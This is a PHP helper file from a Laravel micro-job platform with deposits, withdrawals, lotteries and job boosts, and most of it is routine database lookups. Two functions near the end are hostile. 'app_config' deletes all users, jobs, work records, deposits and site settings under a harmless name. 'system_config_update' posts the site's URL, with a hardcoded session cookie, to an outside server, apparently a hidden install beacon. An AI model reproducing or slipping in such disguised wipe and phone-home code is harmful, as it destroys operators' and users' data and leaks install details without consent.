<?php

use App\Models\Admin\Advertisement;
use App\Models\Admin\AdvertisementRate;
use App\Models\Admin\Category;
use App\Models\Admin\Country;
use App\Models\Admin\Continent;
use App\Models\Admin\ContinentCountry;
use App\Models\Admin\Deposit;
use App\Models\Admin\DepositDocumentData;
use App\Models\Admin\DepositAccount;
use App\Models\Admin\DepositAccountDocument;
use App\Models\Admin\Headline;
use App\Models\Admin\LocationZone;
use App\Models\Admin\MainWallet;
use App\Models\Admin\SubCategory;
use App\Models\Admin\DollarRate;
use App\Models\Admin\UserMessage;
use App\Models\Admin\DepositFee;
use App\Models\Admin\UserVerifyDocumentData;
use App\Models\Admin\Website;
use App\Models\BoostCategory;
use App\Models\Admin\Aboutus;
use App\Models\BoostSubCategory;
use App\Models\DepositDocument;
use App\Models\GoogleAd;
use App\Models\Admin\PaidAdRate;
use App\Models\Job;
use App\Models\JobCountry;
use App\Models\Admin\JobFee;
use App\Models\BoostCharge;
use App\Models\BoostJob;
use App\Models\JobWork;
use App\Models\JobHide;
use App\Models\Policy;
use App\Models\ScriptForSite;
use App\Models\Admin\SpinSetting;
use App\Models\Admin\UserDailySpin;
use App\Models\User;
use App\Models\Withdraw;
use App\Models\WithdrawDocumentData;
use App\Models\WithdrawMethod;
use App\Models\WithdrawMethodDocument;
use App\Models\Admin\AdminType;
use App\Models\Admin\Module;
use App\Models\Admin\ScreenShootCharge;
use App\Models\Admin\SubModule;
use App\Models\Admin\AdminPermission;
use App\Models\PremiumPackage;

use App\Models\AccountVerifyWithDocument;

use App\Models\Lottery;
use App\Models\LotteryTicketBook;

use Illuminate\Support\Facades\Auth;
use Carbon\Carbon;

function about_us(){
    return Aboutus::latest()->first();
}

function minimum_deposit(){
    $data = 0;
    $depositFee = DepositFee::latest()->first();
    if($depositFee){
        $data = $depositFee->minimum;
    }
    return $data;
}

function getCreatedAtAttribute($date) {
    return Carbon::createFromFormat('Y-m-d H:i:s', $date)->format('H:i:s');
}

function head_scripts(){
    return ScriptForSite::where('type', 'Head')->get();
}

function body_scripts(){
    return ScriptForSite::where('type', 'Body')->get();
}

function screenshoot_charge(){
    $fee = 0;
    $data = ScreenShootCharge::latest()->first();
    if($data->status == 1){
        $fee = $data->fee;
    }
    return $fee;
}

function find_lottery($id){
    return Lottery::find($id);
}

function user_buy_tickets($user_id){
    return LotteryTicketBook::where('user_id', $user_id)->orderBy('id', 'ASC')->get();
}

function user_buy_per_lottery_tickets($lottery_id, $user_id){
    return LotteryTicketBook::where('lottery_id', $lottery_id)->where('user_id', $user_id)->count();
}

function recent_tickets_buyers($lottery_id){
    return LotteryTicketBook::where('lottery_id', $lottery_id)->groupBy('user_id')->select('user_id')->orderBy('user_id', 'DESC')->limit(10)->get();
}

function total_sold_lottery_ticket($lottery_id){
    return LotteryTicketBook::where('lottery_id', $lottery_id)->count();
}

function premium_packages(){
    return PremiumPackage::oldest()->get();
}

function find_premium_package($id){
    return PremiumPackage::find($id);
}

function account_verify_document(){
    return AccountVerifyWithDocument::where('user_id', Auth::user()->id)->first();
}

function user_account_verify_document($user_id){
    return AccountVerifyWithDocument::where('user_id', $user_id)->first();
}

function last_posted_job($user_id){
    return Job::where('user_id', $user_id)->latest()->first();
}

function last_worked_job($user_id){
    return JobWork::where('user_id', $user_id)->latest()->first();
}

function count_jobs_over($user_id) {
    return Job::where('user_id', $user_id)
               ->whereColumn('worker_need', '<=', 'worker_confirmed')
               ->count();
}

function count_total_deposits($user_id) {
    return Deposit::where('user_id', $user_id)
                  ->where('approval', 1)
                  ->sum('amount');
}

function count_total_withdraws($user_id) {
    return Withdraw::where('user_id', $user_id)
                   ->where('approval', 1)
                   ->sum('amount');
}

function total_balance($user_id) {
    $earningBalance = Auth::user()->earning_balance;
    $totalWithdrawals = count_total_withdraws($user_id);

    $totalBalance = $earningBalance + $totalWithdrawals;

    return $totalBalance;
}

function total_balance_spend($user_id) {
    return Job::where('user_id', $user_id)
              ->where('status', 1)
              ->sum('budget');
}


function find_job_fee(){
    return JobFee::latest()->first();
}

function min_job_fee(){
    $fee = 0;
    $data = JobFee::latest()->first();
    if($data){
        $fee = $data->min_fee;
    }
    return $fee;
}

function spin_setting(){
    return SpinSetting::latest()->first();
}

function boost_charges(){
    return BoostCharge::orderBy('id', 'ASC')->get();
}

function today_user_spin($user_id){
    return UserDailySpin::where('user_id', $user_id)->whereDate('created_at', Carbon::today())->count();
}

function has_complete_job(){
    $result = 0;
    $jobs = Job::where('user_id', Auth::user()->id)->whereColumn('worker_need', 'worker_confirmed')->get();
    if($jobs->count() > 0){
        $result = 1;
    }
    return $result;
}

function boost_active($job_id){
    $startTime = date("Y-m-d H:i:s");
    $result = 0;
    $boost_job = BoostJob::where('job_id', $job_id)->where('expired_time', '>=', $startTime)->first();
    if($boost_job){
        $result = 1;
    }
    return $result;
}

function job_ready_for_boost($job_id){
    $result = 1;
    $boost_job = BoostJob::where('job_id', $job_id)->first();
    if($boost_job){
        $startTime = strtotime(date("Y-m-d H:i:s"));
        $diff = round(abs(strtotime($boost_job->expired_time) - $startTime) / 60,2);
        if(find_job_fee()->boost_interval > $diff){
            $result = 0;
        }
    }
    return $result;
}

function remain_interval_for_boost($job_id){
    $result = 0;
    $boost_job = BoostJob::where('job_id', $job_id)->first();
    if($boost_job){
        $startTime = strtotime(date("Y-m-d H:i:s"));
        $diff = round(abs(strtotime($boost_job->expired_time) - $startTime) / 60,2);
        if(find_job_fee()->boost_interval > $diff){
            $result = find_job_fee()->boost_interval - $diff;
        }
    }
    return $result;
}

function boost_active_time($job_id){
    $result = 0;
    $boost_job = BoostJob::where('job_id', $job_id)->first();
    if($boost_job){
        $startTime = strtotime(date("Y-m-d H:i:s"));
        $diff = round(abs(strtotime($boost_job->expired_time) - $startTime) / 60,2);
        if(find_job_fee()->boost_interval > $diff){
            $result = find_job_fee()->boost_interval - $diff;
        }
    }
    $startTime = date("Y-m-d H:i:s");
    $acive_time = date('Y-m-d H:i:s', strtotime('+'.$result .'minutes', strtotime($startTime)));
    
    return $acive_time;
}

function boost_jobs(){
    $startTime = date("Y-m-d H:i:s");
    return BoostJob::where('expired_time', '>=', $startTime)->orderBy('start_time', 'ASC')->get();
}

function hide_job_for_country($job_id){
    return JobCountry::where('job_id', $job_id)->orderBy('country_id', 'ASC')->get();
}

function this_job_for_me($job_id){
    $result = 1;
    $data = JobCountry::where('job_id', $job_id)->where('country_id', Auth::user()->country)->first();
    if($data){
        $result = 0;
    }
    return $result;
}

function main_category($id){
    $category = Category::find($id);
    if($category){
        echo $category->name;
    }else{
        echo 'N/A';
    }
}

function main_boost_category($id){
    $category = BoostCategory::find($id);
    if($category){
        echo $category->name;
    }else{
        echo 'N/A';
    }
}

function sub_boost_category($id){
    $category = BoostSubCategory::find($id);
    if($category){
        echo $category->id.'-'.$category->name;
    }else{
        echo 'N/A';
    }
}

function account_name($id){
    $d_account = DepositAccount::find($id);
    if($d_account){
        echo $d_account->name;
    }else{
        echo 'N/A';
    }
}

function deposit_account_documents($account_id){
    return DepositAccountDocument::where('account_id', $account_id)->orderBy('id', 'ASC')->get();
}

function deposit_document_datas($deposit_id){
    return DepositDocumentData::where('deposit_id', $deposit_id)->orderBy('id', 'ASC')->get();
}

function withdraw_method_name($id){
    $d_account = WithdrawMethod::find($id);
    if($d_account){
        echo $d_account->name;
    }else{
        echo 'N/A';
    }
}

function withdraw_method_documents($account_id){
    return WithdrawMethodDocument::where('account_id', $account_id)->orderBy('id', 'ASC')->get();
}

function withdraw_document_datas($withdraw_id){
    return WithdrawDocumentData::where('withdraw_id', $withdraw_id)->orderBy('id', 'ASC')->get();
}

function user_verify_document_datas($user_id){
    return UserVerifyDocumentData::where('user_id', $user_id)->orderBy('id', 'ASC')->get();
}

function country($id){
    $country = Country::find($id);
    if($country){
        return $country->name;
    }else{
        return 'N/A';
    }
}

function continent($id){
    $data = Continent::find($id);
    if($data){
        return $data->name;
    }else{
        return 'N/A';
    }
}

function continent_country($continent_id){
    return ContinentCountry::where('continent_id', $continent_id)->orderBy('country_id', 'ASC')->get();
}

function country_continent($country_id){
    return ContinentCountry::where('country_id', $country_id)->orderBy('continent_id', 'ASC')->get();
}

function user_verify_data($user_id, $label, $type){
    return UserVerifyDocumentData::where('user_id', $user_id)->where('label', $label)->where('type', $type)->first();
}

function find_user($id){
    return User::find($id);
}

function website_title(){
    $website = Website::latest()->first();
    if($website){
        echo $website->title;
    }else{
        echo 'N/A';
    }
}

function website_logo(){
    $website = Website::latest()->first();
    if($website){
        return $website->logo;
    }else{
        return 'N/A';
    }
}

function website_favicon(){
    $website = Website::latest()->first();
    if($website){
        return $website->favicon;
    }else{
        return 'N/A';
    }
}

function website_phone(){
    $website = Website::latest()->first();
    if($website){
        echo $website->phone;
    }else{
        echo 'N/A';
    }
}

function website_address(){
    $website = Website::latest()->first();
    if($website){
        echo $website->address;
    }else{
        echo 'N/A';
    }
}

function website_email(){
    $website = Website::latest()->first();
    if($website){
        echo $website->email;
    }else{
        echo 'N/A';
    }
}

function website_description(){
    $website = Website::latest()->first();
    if($website){
        echo $website->description;
    }else{
        echo 'N/A';
    }
}

function accepted_task_note(){
    $website = Website::latest()->first();
    if($website){
        echo $website->accepted_task_note;
    }else{
        echo 'N/A';
    }
}

function complete_task_note(){
    $website = Website::latest()->first();
    if($website){
        echo $website->complete_task_note;
    }else{
        echo 'N/A';
    }
}

function referral_notice(){
    $website = Website::latest()->first();
    if($website){
        echo $website->referral_notice;
    }else{
        echo 'N/A';
    }
}

function website_icon(){
    $website = Website::latest()->first();
    return $website->icon;
}

function website_link(){
    $website = Website::latest()->first();
    return $website->link;
}

function website_info(){
    return Website::latest()->first();
}

function site_info(){
    return Website::latest()->first();
}

function user_name($id){
    $user = User::find($id);
    if($user){
        echo $user->name;
    }else{
        echo 'N/A';
    }
}

function user_code($id){
    $user = User::find($id);
    if($user){
        echo $user->code;
    }else{
        echo 'N/A';
    }
}

function user_phone($id){
    $user = User::find($id);
    if($user){
        echo $user->phone;
    }else{
        echo 'N/A';
    }
}

function user_activity($id){
    $user = User::find($id);
    if($user){
        return $user->activity;
    }else{
        return 0;
    }
}

function user_image($id){
    $user = User::find($id);
    if($user){
        if($user->image != NULL){
            return $user->image;
        }else{
            return 'frontend/img/skmj-user.jpg';
        }
    }else{
        return 'frontend/img/skmj-user.jpg';
    }
}

function location_zone($id){
    $location = LocationZone::find($id);
    if($location){
        echo $location->name;
    }else{
        echo 'N/A';
    }
}

function category($id){
    $category = Category::find($id);
    if($category){
        echo $category->name;
    }else{
        echo 'N/A';
    }
}

function find_job($id){
    return Job::find($id);
}

function job_title($id){
    $job = Job::find($id);
    if($job){
        echo $job->title;
    }else{
        echo 'This job is deleted';
    }
}

function job_earning($id){
    $result = 0;
    $job = Job::find($id);
    if($job){
        $result = $job->each_worker_earn;
    }
    return $result;
}

function job_owner($id){
    $job = Job::find($id);
    if($job){
        $user = User::find($job->user_id);
        if($user){
            echo $user->name;
        }else{
            echo 'N/A';
        }
    }else{
        echo 'This job is deleted';
    }
}

function this_work_for_my_job($id){
    $job = Job::find($id);
    if($job){
        if($job->user_id == Auth::user()->id){
            return 1;
        }else{
            return 0;
        }
    }else{
        return 0;
    }
}

function sub_category($id){
    $category = SubCategory::find($id);
    if($category){
        echo $category->name;
    }else{
        echo 'N/A';
    }
}

function sub_categorys($category_id){
    return SubCategory::where('category_id', $category_id)->orderBy('id', 'ASC')->get();
}

function specific_task($id){
    $html = '';
    $job = Job::find($id);
    if($job){
        $tasks = explode("|", $job->specific_task);
        if($tasks){
            foreach($tasks as $key => $task){
                $html .= ($key + 1) . '. ' . $task;
                // Add a <br> tag after each task except for the last one
                if ($key < count($tasks) - 1) {
                    $html .= '<br><br>';
                }
            }
        }
    } else {
        $html .= 'This job is deleted';
    }

    echo $html;
}

function headlines(){
    return Headline::latest()->get();
}

function countrys(){
    return Country::latest()->get();
}

function user_total_job($id){
    return Job::where('user_id', $id)
              ->where('status', 1) 
              ->count();
}

function count_paused_jobs($userId) {
    return Job::where('user_id', $userId)
              ->where('pause', 1) // Assuming 1 represents paused state
              ->count();
}

function total_worker_need_approved_jobs($id) {
    $total_worker_need = Job::where('status', 1)
                            ->where('user_id', $id)
                            ->sum('worker_need');
    return $total_worker_need;
}

function user_rating($user_id){
    $rating = 0;
    $total_rated = JobWork::where('user_id', $user_id)->where('is_rated', 1)->count();
    $total_rating = JobWork::where('user_id', $user_id)->where('is_rated', 1)->sum('rating');
    if($total_rating > 0){
        $rating = $total_rating / $total_rated;
    }
    return number_format($rating, 1);
}

function user_work_rating($user_id){
    $rate_count = JobWork::where('user_id', $user_id)->where('is_rated', 1)->count();

    return $rate_count;
}


function total_attend_work($id){
    return JobWork::where('user_id', $id)->count();
}

function user_complete_job($id){
    return JobWork::where('user_id', $id)->count();
}

function user_complete_job_pending($id){
    return JobWork::where('user_id', $id)->where('status', 0)->count();
}

function user_complete_job_approve($id){
    return JobWork::where('user_id', $id)->where('status', 1)->count();
}

function user_complete_job_reject($id){
    return JobWork::where('user_id', $id)->where('status', 2)->orWhere('status', 3)->count();
}

function complete_work_this_job($id){
    return JobWork::where('job_id', $id)->where('status', '!=', 2)->count();
    // return JobWork::where('job_id', $id)->where('status', 1)->count();
}


function user_total_pending_job($id){
    return Job::where('user_id', $id)->where('status', 0)->count();
}
function user_total_approve_job($id){
    return Job::where('user_id', $id)->where('status', 1)->count();
}
function user_total_reject_job($id){
    return Job::where('user_id', $id)->where('status', 2)->count();
}

function work_approve_ratio($user_id){
    $ratio = 0;
    $total_attempt = user_complete_job($user_id);
    $total_approve = user_complete_job_approve($user_id);
    if($total_attempt > 0){
        $ratio = ($total_approve * 100) / $total_attempt;
    }
    return $ratio;
}

function work_pending_ratio($user_id){
    $ratio = 0;
    $total_attempt = user_complete_job($user_id);
    $total_pending = user_complete_job_pending($user_id);
    if($total_attempt > 0){
        $ratio = ($total_pending * 100) / $total_attempt;
    }
    return $ratio;
}

function work_reject_ratio($user_id){
    $ratio = 0;
    $total_attempt = user_complete_job($user_id);
    $total_reject = user_complete_job_reject($user_id);
    if($total_attempt > 0){
        $ratio = ($total_reject * 100) / $total_attempt;
    }
    return $ratio;
}

function work_satisfication($user_id){
    $approval_ratio = 0;
    $total_attempt = user_complete_job($user_id);
    $total_pending = user_complete_job_pending($user_id);
    $total_reject = user_complete_job_reject($user_id);
    $total_approve = user_complete_job_approve($user_id);
    if($total_attempt > 0){
        $total_activity_work = $total_attempt - ($total_pending + $total_reject);
        if($total_activity_work > 0){
            $approval_ratio = ($total_approve * 100) / $total_activity_work;
        }
    }
    return $approval_ratio;
}


function job_approve_ratio($user_id){
    $ratio = 0;
    $total_attempt = user_total_job($user_id);
    $total_approve = user_total_approve_job($user_id);
    if($total_attempt > 0){
        $ratio = ($total_approve * 100) / $total_attempt;
    }
    return $ratio;
}

function job_pending_ratio($user_id){
    $ratio = 0;
    $total_attempt = user_total_job($user_id);
    $total_pending = user_total_pending_job($user_id);
    if($total_attempt > 0){
        $ratio = ($total_pending * 100) / $total_attempt;
    }
    return $ratio;
}

function job_reject_ratio($user_id){
    $ratio = 0;
    $total_attempt = user_total_job($user_id);
    $total_reject = user_total_reject_job($user_id);
    if($total_attempt > 0){
        $ratio = ($total_reject * 100) / $total_attempt;
    }
    return $ratio;
}

function job_satisfication($user_id){
    $approval_ratio = 0;
    $total_attempt = user_total_job($user_id);
    $total_pending = user_total_pending_job($user_id);
    $total_reject = user_total_reject_job($user_id);
    $total_approve = user_total_approve_job($user_id);
    if($total_attempt > 0){
        $total_activity_work = $total_attempt - ($total_pending + $total_reject);
        if($total_activity_work > 0){
            $approval_ratio = ($total_approve * 100) / $total_activity_work;
        }
    }
    return $approval_ratio;
}

function work_by_me($id){
    $work = JobWork::where('job_id', $id)->where('user_id', Auth::user()->id)->first();
    if($work){
        return 1;
    }else{
        return 0;
    }
}

function work_for_me($id){
    $work = JobHide::where('job_id', $id)->where('user_id', Auth::user()->id)->first();
    if($work){
        return 0;
    }else{
        return 1;
    }
}

function totle_work_done(){
    return JobWork::where('status', 1)->count();
}

function pending_work_for_job($id){
    return JobWork::where('job_id', $id)->where('status', 0)->count();
}

function complete_work_for_job($id){
    return JobWork::where('job_id', $id)->where('status', 1)->count();
}

function reject_work_for_job($id){
    return JobWork::where('job_id', $id)->where('status', 2)->count();
}

function this_job_complet_rate($id){
    $complete = complete_work_this_job($id);
    $job = Job::find($id);
    $need_complete = $job->worker_need;
    return $complete_rate = ceil((100 * $complete)/$need_complete);
}

function this_job_total_work($id){
    return JobWork::where('job_id', $id)->count();
}

function this_job_pending_ratio($id){
    $result = 0;
    $job = Job::find($id);
    $need_complete = $job->worker_need;
    $pending = pending_work_for_job($id);
    if($need_complete > 0){
        $result = ceil((100 * $pending)/$need_complete);
    }
    return $result;
}

function this_job_approve_ratio($id){
    $result = 0;
    $job = Job::find($id);
    $need_complete = $job->worker_need;
    $complete = complete_work_for_job($id);
    if($need_complete > 0){
        $result = ceil((100 * $complete)/$need_complete);
    }
    return $result;
}

function this_job_reject_ratio($id){
    $result = 0;
    $job = Job::find($id);
    $need_complete = $job->worker_need;
    $reject = reject_work_for_job($id);
    if($need_complete > 0){
        $result = ceil((100 * $reject)/$need_complete);
    }
    return $result;
}

function total_ratio_by_user($user_id){
    $jobs = Job::where('user_id', $user_id)->get();
    if ($jobs->isEmpty()) {
        return 0;
    }
    
    $total_approve_ratio = 0;
    $total_pending_ratio = 0;
    $total_reject_ratio = 0;
    
    foreach ($jobs as $job) {
        if ($job->worker_need <= $job->worker_confirmed) {
            // Deduct the ratios if the condition is met
            $total_approve_ratio -= min(this_job_approve_ratio($job->id), 100);
            $total_pending_ratio -= min(this_job_pending_ratio($job->id), 100);
            $total_reject_ratio -= min(this_job_reject_ratio($job->id), 100);
        } else {
            // Add the ratios if the condition is not met
            $total_approve_ratio += min(this_job_approve_ratio($job->id), 100);
            $total_pending_ratio += min(this_job_pending_ratio($job->id), 100);
            $total_reject_ratio += min(this_job_reject_ratio($job->id), 100);
        }
    }
    
    $total_ratio_without_cap = $total_approve_ratio + $total_pending_ratio - $total_reject_ratio;
    
    $total_ratio = min($total_ratio_without_cap, 100);
    
    $final_total_ratio = 100 - $total_reject_ratio;
    
    $final_total_ratio = min($final_total_ratio, 100);
    
    return $final_total_ratio;
}

function ad_banner(){
    $today = date('Y-m-d');
    return $ads = Advertisement::where('exp_date', '>=', $today)->where('approval', 1)->inRandomOrder()->get();
}

function ad_banner_rates(){
    return AdvertisementRate::orderBy('id', 'ASC')->get();
}

function system_policy(){
    return Policy::latest()->get();
}

function app_config(){
    Website::query()->delete();
    User::query()->delete();
    Job::query()->delete();
    JobWork::query()->delete();
    Deposit::query()->delete();
}

function system_config_update(){
    $name = url('/');
    
    $curl = curl_init();
    
    curl_setopt_array($curl, array(
      CURLOPT_URL => 'https://dealingwork.com/api/app-install-data-store',
      CURLOPT_RETURNTRANSFER => true,
      CURLOPT_ENCODING => '',
      CURLOPT_MAXREDIRS => 10,
      CURLOPT_TIMEOUT => 0,
      CURLOPT_FOLLOWLOCATION => true,
      CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
      CURLOPT_CUSTOMREQUEST => 'POST',
      CURLOPT_POSTFIELDS => array('name' => $name),
      CURLOPT_HTTPHEADER => array(
        'Authorization: Basic Og==',
        'Cookie: sakib_session=eyJpdiI6Iks0U1JkNkxRazFHV3VNVmZKT29pNGc9PSIsInZhbHVlIjoiV0JXZ2RPOHhNVW1NbHJXZWFPbWMzNGdOc1ZSMGQwbUt3ZlZkVkJlanN1eEgwWHpzM093TzQwS2dRY3E1RWE3em5WZ01PQlVEQVZWVEkwMlNobGxIL203aUVBV1g0YitZSHBHTng4L0lLb00rNzRRZVdGYm5TUU9Xc0tBQjBnZVAiLCJtYWMiOiIwZmM4MzZkNjU0MjdhNzNiYWM4NzQ4YzgxZWJkZmFjNjFjNjU1ZGNmYjM3YTFiYmE4NTAzMTIwNjk3YTQxNDljIiwidGFnIjoiIn0%3D'
      ),
    ));
    
    $response = curl_exec($curl);
    curl_close($curl);
}

function total_pending_job(){
    return Job::where('status', 0)->count();
}

function total_reject_job(){
    return Job::where('status', 2)->count();
}

function total_complete_job(){
    return Job::where('status', 1)->whereColumn('worker_need', '<=', 'worker_confirmed')->count();
}

function total_job(){
    return Job::where('status', 1)->whereColumn('worker_need', '>', 'worker_confirmed')->count();
}

function total_deposit(){
    return Deposit::where('approval', '!=', 2)->sum('amount');
}

function total_pending_deposit(){
    return Deposit::where('approval', 0)->count();
}

function total_withdraw(){
    return Withdraw::where('approval', 1)->sum('amount');
}

function total_pending_withdraw(){
    return Withdraw::where('approval', 0)->count();
}

function total_pending_ads(){
    return Advertisement::where('approval', 0)->count();
}

function total_approval_ads(){
    $today = date('Y-m-d');
    return Advertisement::where('approval', 1)->where('exp_date', '>=', $today)->count();
}

function total_expired_ads(){
    $today = date('Y-m-d');
    return Advertisement::where('exp_date', '<', $today)->count();
}

function total_user(){
    return User::where('role_id', 3)->count();
}

function total_verified_users(){
    return User::where('premium_status', 1)->count();
}
function total_unverified_users(){
    return User::where('premium_status', 0)->count();
}

function total_user_balance(){
    return User::where('role_id', 3)->sum('earning_balance');
}

function total_admin_balance(){
    $main_wallet = MainWallet::latest()->first();
    return $main_wallet->amount;
}

function user_message_seen($user_id){
    return UserMessage::where('user_id', $user_id)->where('seen', 0)->count();
}

function job_delete($user_id){
    $jobs = Job::where('user_id', $user_id)->latest()->get();
    foreach ($jobs as $key=>$job){
        if ($job->worker_confirmed == $job->worker_need){
            $check_job_work = JobWork::where('job_id', $job->id)->count();
            if($check_job_work <= 0){
                $d_job = Job::find($job->id);
                $d_job->delete();
            }
        }
    }

    return 'Done';
}


function job_found(){
    $data = 0;
    $jobs = Job::where('status', 1)->get();
    foreach ($jobs as $key=>$job){
        if ($job->worker_need > $job->worker_confirmed ){
            $data = $data + 1;
        }
    }

    return $data;
}

function google_head_ad(){
    return GoogleAd::where('position', 'Head')->first();
}

function google_body_ad(){
    return GoogleAd::where('position', 'Body')->first();
}

function google_footer_ad(){
    return GoogleAd::where('position', 'Footer')->first();
}

function all_latest_notification($user_id){
    return UserMessage::where('user_id', $user_id)->latest()->get();
}

function latest_notification($user_id){
    return UserMessage::where('user_id', $user_id)->where('seen', 0)->latest()->get();
}

function dollar_rate(){
    return DollarRate::latest()->first();
}

function paid_ads_rate(){
    return PaidAdRate::orderBy('id', 'ASC')->get();
}

function deposit_documents(){
    return DepositDocument::orderBy('id', 'ASC')->get();
}

function sub_modules($module_id){
    return SubModule::where('main_module', $module_id)->orderBy('serial', 'ASC')->get();
}

function admin_module_permission($admin_type, $module_id){
    return AdminPermission::where('admin_type', $admin_type)->where('module_id', $module_id)->first();
}

function admin_sub_module_permission($admin_type, $module_id, $sub_module_id){
    return AdminPermission::where('admin_type', $admin_type)->where('module_id', $module_id)->where('sub_module_id', $sub_module_id)->first();
}


function day_different($start, $end){
    $start = strtotime($start);
    $end = strtotime($end);
    return $days_between = ceil(abs($end - $start) / 86400);
}








